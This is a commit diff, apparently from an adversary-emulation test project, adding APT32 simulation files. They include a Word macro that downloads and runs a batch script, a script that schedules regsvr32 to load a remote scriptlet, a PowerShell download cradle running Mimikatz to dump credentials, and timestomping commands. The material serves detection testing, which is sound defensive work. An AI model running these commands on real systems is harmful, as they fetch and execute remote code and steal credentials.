Michael Haag
GitHub
commit
fd832ae264
|
|
@ -0,0 +1,3 @@
|
||||||
|
### Group: APT32, OceanLotus Group
|
||||||
|
[APT32](https://attack.mitre.org/wiki/Group/G0050)
|
||||||
|
|
||||||
|
|
@ -0,0 +1,48 @@
|
||||||
|
' Save Document As Single Web Page .mht
|
||||||
|
' Rename Document As .Doc
|
||||||
|
' This Document is modeled after FireEye's report on APT32
|
||||||
|
' Special Thanks to Nick Carr for his work on this write-ip
|
||||||
|
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
|
||||||
|
|
||||||
|
Sub AutoOpen()
|
||||||
|
|
||||||
|
Dim myURL As String
|
||||||
|
Dim myPath As String
|
||||||
|
|
||||||
|
|
||||||
|
If (MsgBox("You're Are About To Execute the ATOMIC Test for APT32, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
|
||||||
|
End ' This Ends Macro
|
||||||
|
End If
|
||||||
|
|
||||||
|
' Downloads APT32 Chain Reaction Script
|
||||||
|
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat"
|
||||||
|
|
||||||
|
Dim WinHttpReq As Object
|
||||||
|
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
|
||||||
|
WinHttpReq.Open "GET", myURL, False, "username", "password"
|
||||||
|
WinHttpReq.send
|
||||||
|
|
||||||
|
myURL = WinHttpReq.responseBody
|
||||||
|
If WinHttpReq.Status = 200 Then
|
||||||
|
Set oStream = CreateObject("ADODB.Stream")
|
||||||
|
oStream.Open
|
||||||
|
oStream.Type = 1
|
||||||
|
oStream.Write WinHttpReq.responseBody
|
||||||
|
|
||||||
|
Dim fso As Object
|
||||||
|
Const FLDR_NAME As String = "C:\Tools\"
|
||||||
|
|
||||||
|
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||||
|
|
||||||
|
If Not fso.FolderExists(FLDR_NAME) Then
|
||||||
|
fso.CreateFolder (FLDR_NAME)
|
||||||
|
End If
|
||||||
|
|
||||||
|
' Change Path HERE
|
||||||
|
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
|
||||||
|
' EXECUTE FROM PATH
|
||||||
|
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
|
||||||
|
oStream.Close
|
||||||
|
End If
|
||||||
|
|
||||||
|
End Sub
|
||||||
|
|
@ -0,0 +1,32 @@
|
||||||
|
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
|
||||||
|
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
|
||||||
|
:: Thanks to Nick Carr for his research on this group
|
||||||
|
:: Sample Representation of ATT&CK Techniques used by APT32
|
||||||
|
:: Tactics: Execution, Persistence, Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
:: Tactic: Privilege Escalation / Execution
|
||||||
|
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
|
||||||
|
:: Create Scheduled Task With RegSv32 Payload
|
||||||
|
|
||||||
|
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
|
||||||
|
|
||||||
|
SCHTASKS /Delete /TN "Atomic Testing" /F
|
||||||
|
|
||||||
|
:: Tactics: Execution
|
||||||
|
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
|
||||||
|
|
||||||
|
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
||||||
|
|
||||||
|
:: Tactics: Defense Evasion
|
||||||
|
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
|
||||||
|
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
|
||||||
|
|
||||||
|
echo "Atomic Test File" > test.txt
|
||||||
|
PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
|
||||||
|
|
||||||
|
:: Tactics: Defense Evasion
|
||||||
|
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
|
||||||
|
|
||||||
|
:: Deletes File, detection here would be File Modificaiton
|
||||||
|
del test.txt
|
||||||
|
|
@ -0,0 +1,10 @@
|
||||||
|
# Timestomp
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099)
|
||||||
|
|
||||||
|
## Timestomp with PowerShell
|
||||||
|
|
||||||
|
#### Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
|
||||||
|
|
||||||
|
echo "Atomic Test File" > test.txt
|
||||||
|
PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
|
||||||
|
|
@ -35,6 +35,6 @@
|
||||||
| Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | |
|
| Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | |
|
||||||
| | | Scripting | | | | | | | |
|
| | | Scripting | | | | | | | |
|
||||||
| | | Software Packing | | | | | | | |
|
| | | Software Packing | | | | | | | |
|
||||||
| | | Timestomp | | | | | | | |
|
| | | [Timestomp](Defense%20Evasion/Timestomp.md | | | | | | | |
|
||||||
| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
|
| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
|
||||||
| | | Valid Accounts | | | | | | | |
|
| | | Valid Accounts | | | | | | | |
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue